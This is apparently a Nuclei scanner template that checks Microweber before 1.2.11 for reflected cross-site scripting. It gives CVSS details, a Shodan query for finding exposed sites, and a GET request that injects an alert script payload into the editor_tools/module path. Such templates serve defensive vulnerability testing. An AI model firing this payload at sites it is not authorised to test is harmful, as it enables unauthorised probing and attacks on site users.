id: microweber-xss

info:
  name: Microweber Cross-Site Scripting
  author: gy741
  severity: high
  description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber.
  reference:
    - https://github.com/microweber/microweber/issues/809
    - https://github.com/microweber/microweber
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    shodan-query: http.favicon.hash:780351152
  tags: microweber,xss,oss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(document.domain)</script>&params=filetype=images#path='

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>" 0="filetype=images"'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/30
